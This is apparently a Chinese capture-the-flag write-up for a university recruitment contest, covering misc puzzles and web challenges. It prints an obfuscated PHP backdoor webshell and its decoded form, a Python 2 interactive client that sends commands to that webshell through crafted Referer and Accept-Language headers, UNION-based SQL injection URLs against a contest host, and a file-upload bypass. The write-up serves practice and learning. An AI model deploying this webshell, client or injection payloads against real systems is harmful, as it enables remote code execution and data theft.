D.I.E&Trinity CTF部分wp

emmm 天津大学和南京大学的招新赛，题目还是很有质量的，tcl了，有些题还是不会
记一下吧

misc

签到

下载一个附件，file看一下，发现是data，不管了，直接foremost分离一下
foremost data
有两个图片一个jpg，一个png两个图片是一样的，盲猜盲水印
项目下载https://github.com/chishaxie/BlindWaterMark
直接python3 bwmforpy3.py decode 00001537.png 00001404.jpg a.png
发现，图片不太清楚，问了下出题人，有alpha值，研究一下脚本

看到 --alpha <float>, Manual setting alpha (default is 3.0)
默认值为三，我们调到5 python3 bwmforpy3.py decode 00001537.png 00001404.jpg a.png --alpha 5
还是不清楚，加到10 python3 bwmforpy3.py decode 00001537.png 00001404.jpg a.png --alpha 10

ezdecode

签到题，是各种编码的组合

编码1：You Know That
ZmxhZ3t3M2xjMG1f   -->base64
flag{w3lc0m_7o_amaz1n9_CTF_vv0RId_!}
编码2：Key == 2
7_mznoaa19    -->栅栏   key为为2
编码3：Play With Bubble
xilog-fahig-kalal-kytef-begig-nanyh-zumal-tuxox   -->气泡
`http://www.hiencode.com/bubble.html`
_CTF_vv0RId_!}

这里有后门！

个人认为这个题还是非常有趣的，里面涉及的加密方法还没搞懂，写一下做题记录吧
拿到附件，题目已经说了，是后门，看了一下,显然是经过混淆加密的

<?php
$u='S+)$p.iS=$iSq[$m[2][$z]iS]iSiS;if(strpos(iS$p,$h)===0iS){$s[$iiS]=iS"";$iSpiS=$ss($p,3);}if(arriSiSay';
$H='s=&iS$_SESSiSION;$ss="subsiSiStr";$sliS="stiSrtolower";$i=$miS[1][iS0].iS$m[iS1][iS1];$h=$sl($ss(md5iS';
$X='($i.iS$kh),0,iS3)iS);$f=$sl(iS$ssiS(iSmd5($i.$kf),iS0iS,iS3));$p="";foriS($z=1;$z<couiSiSnt($m[1]);$z+i';
$L=str_replace('x','','crexxatex_fxxunxction');
$E=';$i<$l;){foriS($j=0;(iS$j<$ciS&&iS$i<$l);$jiSiS++,iS$i++){$o.=$t{$iiS}^$k{$j}iS;iS}iS}riSeturn $o;}$iSr=iSiS$';
$Q='=basiSiSe64_encode(x(giSzcompress($o)iS,$k)iS);print("iS<$k>iS$d</iS$k>");@siSessioniS_destroyiS();}}}}';
$p='_SiSERViSEiSR;iS$rr=@$r["HTTiSP_REFEiSRER"iS];$ra=@$r[iS"iSHTTP_ACCEiSPT_LANGiSUAGE"]iS;ifiS($rr&&$iSra){$';
$l='iS$kiSh="3481"iS;iS$kf="iS9diS7b";funiSctiSion x($t,$k){$c=strliSen($kiS);iSiS$l=strlen($tiS);$o="";foiSr(iS$i=0iS';
$h='ll(iS"/([\\w])iS[\\w-]+(iS?:;q=0.iS([iSiS\\d]))?,?/",iS$riSa,iS$miS);if($q&&$m){@siSession_staiSrtiS(iS);$';
$Z='art();@evaiSl(@giSzuniSiSciSompress(@x(@baseiS64_decodeiS(pregiS_riSeplace(ariSray("/_/","/-/iS"),arriSa';
$W='_key_exiSists(iS$i,$s)){iS$siS[$i].=$piS;$e=iSiSstrpos($siS[$iiS]iS,$f);if($e){$k=$kh.$kiSf;ob_stiSiS';
$g='u=paiSrse_iSiSurl($rr);pariSse_siStr($u["queriSy"],$iSq)iS;iSiS$q=array_iSvaluiSes($q);pregiS_match_a';
$D='y(iS"/",iS"iS+")iS,$ss($s[$i],iS0,$e)iS)),$k)))iS;$o=obiS_get_iSiScontents()iS;ob_eniSd_iScleaiSn();$d';
$O=str_replace('iS','',$l.$E.$p.$g.$h.$H.$X.$u.$W.$Z.$D.$Q);
$q=$L('',$O);$q();
?>

google一下关键代码，直接出了一个解密网站https://www.unphp.net/把代码拿到这个网站解一下

后面，搜到这个马子知道居然还可以直接输出

<?php $kh = "3481";
$kf = "9d7b";
function x($t, $k) {
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0;$i < $l;) {
        for ($j = 0;($j < $c && $i < $l);$j++, $i++) {
            $o.= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s = & $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i = $m[1][0] . $m[1][1];
        $h = $sl($ss(md5($i . $kh), 0, 3));
        $f = $sl($ss(md5($i . $kf), 0, 3));
        $p = "";
        for ($z = 1;$z < count($m[1]);$z++) $p.= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i].= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                $d = base64_encode(x(gzcompress($o), $k));
                print ("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}

马子还臭还长，直接搜马子里关键代码，https://www.jianshu.com/p/c8099299ac2a
当时看的不是这个师傅的文章，当时的找不到了，都一样，python一建利用脚本

from random import randint, choice
from hashlib import md5
import urllib
import string
import zlib
import base64
import requests
import re
def choicePart(seq, amount):
    length = len(seq)
    if length == 0 or length < amount:
        print 'Error Input'
        return None
    result = []
    indexes = []
    count = 0
    while count < amount:
        i = randint(0, length - 1)
        if not i in indexes:
            indexes.append(i)
            result.append(seq[i])
            count += 1
            if count == amount:
                return result


def randBytesFlow(amount):
    result = ''
    for i in xrange(amount):
        result += chr(randint(0, 255))
    return result


def randAlpha(amount):
    result = ''
    for i in xrange(amount):
        result += choice(string.ascii_letters)
    return result


def loopXor(text, key):
    result = ''
    lenKey = len(key)
    lenTxt = len(text)
    iTxt = 0
    while iTxt < lenTxt:
        iKey = 0
        while iTxt < lenTxt and iKey < lenKey:
            result += chr(ord(key[iKey]) ^ ord(text[iTxt]))
            iTxt += 1
            iKey += 1
    return result


def debugPrint(msg):
    if debugging:
        print msg


# config
debugging = False
keyh = "3481"  # $kh
keyf = "9d7b"  # $kf
xorKey = keyh + keyf
url = 'http://42.192.64.28:8083/shell.php'
defaultLang = 'zh-CN'
languages = ['zh-TW;q=0.%d', 'zh-HK;q=0.%d', 'en-US;q=0.%d', 'en;q=0.%d']
proxies = None  # {'http':'http://127.0.0.1:8080'} # proxy for debug

sess = requests.Session()

# generate random Accept-Language only once each session
langTmp = choicePart(languages, 3)
indexes = sorted(choicePart(range(1, 10), 3), reverse=True)

acceptLang = [defaultLang]
for i in xrange(3):
    acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr = ','.join(acceptLang)
debugPrint(acceptLangStr)

init2Char = acceptLang[0][0] + acceptLang[1][0]  # $i
md5head = (md5(init2Char + keyh).hexdigest())[0:3]
md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(3, 8))
debugPrint('$i is %s' % (init2Char))
debugPrint('md5 head: %s' % (md5head,))
debugPrint('md5 tail: %s' % (md5tail,))

# Interactive php shell
cmd = raw_input('phpshell > ')
while cmd != '':
    # build junk data in referer
    query = []
    for i in xrange(max(indexes) + 1 + randint(0, 2)):
        key = randAlpha(randint(3, 6))
        value = base64.urlsafe_b64encode(randBytesFlow(randint(3, 12)))
        query.append((key, value))
    debugPrint('Before insert payload:')
    debugPrint(query)
    debugPrint(urllib.urlencode(query))

    # encode payload
    payload = zlib.compress(cmd)
    payload = loopXor(payload, xorKey)
    payload = base64.urlsafe_b64encode(payload)
    payload = md5head + payload

    # cut payload, replace into referer
    cutIndex = randint(2, len(payload) - 3)
    payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail)
    iPiece = 0
    for i in indexes:
        query[i] = (query[i][0], payloadPieces[iPiece])
        iPiece += 1
    referer = url + '?' + urllib.urlencode(query)
    debugPrint('After insert payload, referer is:')
    debugPrint(query)
    debugPrint(referer)

    # send request
    r = sess.get(url, headers={'Accept-Language': acceptLangStr, 'Referer': refe                                                                                   rer}, proxies=proxies)
    html = r.text
    debugPrint(html)

    # process response
    pattern = re.compile(r'<%s>(.*)</%s>' % (xorKey, xorKey))
    output = pattern.findall(html)
    if len(output) == 0:
        print 'Error,  no backdoor response'
        cmd = raw_input('phpshell > ')
        continue
    output = output[0]
    debugPrint(output)
    output = output.decode('base64')
    output = loopXor(output, xorKey)
    output = zlib.decompress(output)
    print output
    cmd = raw_input('phpshell > ')

改掉中间的url和key就可以了，py2的

直接打就行了，具体原因嘛，还需要继续研究研究

这个doc不对劲

这个题好玩，比较有趣，但是中间出现了一些意外，不过无伤大雅
下载附件，是个doc，显然60M+的doc不太现实，直接改成zip包
有一个key.txt，预览看不太正常，可能是0宽，网站打一下

刚开始以为要掩码爆破，但是没跑出来，问了下出题人，题有些问题，直接给密码了解一下压缩包
Because I like naruto best
解一下压缩包，可以看到有许多图片，一共129488张，看小图片是两种不一样的图片，盲猜转01，八个为一位，转ascii转出来就可以了，人工肯定不现实，贴一下脚本

# a = 104329
# for i in range(300,400):
#     if int(i)*int(i)==a:
#         print(i)

from asyncore import write
import os
fi = open('D:\\vscodework\\ctf\\tj\\tjtest.txt','a')
for i in range(130000):
    #八个为一组八个后输出回车
    if int(i)%8==0:
        fi.write('\n')
    #读取所有文件夹下图片，根据getsize判断
    a=os.path.getsize('C:\\Users\\xin\\Desktop\\love\\out\\'+str(i)+'.png')
    if a==262:
        fi.write('0')
        print(0,end='')
    else:
        print(1,end='')
        fi.write('1')
fi.close()

with open("D:\\vscodework\\ctf\\tj\\tjtest.txt","r") as f:
    data = f.readlines()
    for i in data:
        i = i.strip('\n')
        try:
            print(chr(int(i, 2)),end="")
        except:
            pass

这里需要注意的是getsize是判断图片的字节

运行出来，是base64图片，直接复制到浏览器就好了

输出的东西直接放到浏览器运行就可以了

web

ezsql

sql注入没有任何过滤,直接打就可以了

http://123.56.40.11/sql.php?id=-1 union select version(),group_concat(schema_name),version(),version() from information_schema.schemata-- -
http://123.56.40.11/sql.php?id=-1 union select version(),group_concat(table_name),version(),version() from information_schema.tables where table_schema='CTF'-- -
http://123.56.40.11/sql.php?id=-1 union select version(),group_concat(column_name),version(),version() from information_schema.columns where table_schema='CTF' and table_name='flag'-- -
http://123.56.40.11/sql.php?id=-1 union select version(),flag,null,null from CTF.flag-- -

upload bypass

文件上传，前端检测，先上传一个png图片抓包，然后改后缀，cat /flag即可

unserialize

ctfshow反序列化原题

<?php
    class ctfShowUser{
        
        public $username = 'xxxxxx';
        public $password = 'xxxxxx';
        public $isVip=true;
    }
    $a=new ctfShowUser();
    echo serialize($a);